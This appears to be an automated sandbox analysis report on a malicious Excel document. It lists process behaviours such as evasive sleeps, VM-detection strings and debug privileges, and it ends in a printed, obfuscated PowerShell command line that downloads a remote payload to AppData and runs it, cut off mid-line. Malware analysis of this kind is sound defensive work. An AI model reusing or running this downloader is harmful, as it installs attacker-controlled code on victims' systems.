Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4538	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3577	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5288	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 852	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 814	Jump to behavior
Source: C:\Windows\splwow64.exe	Window / User API: threadDelayed 612

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep count: 5288 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep count: 852 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep count: 814 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880	Thread sleep count: 270 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7956	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000

Source: mshta.exe, 00000000.00000003.1787650198.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2966146591.000002AB2DC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2967560916.000002AB2F05C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1781803953.0000000007B28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item 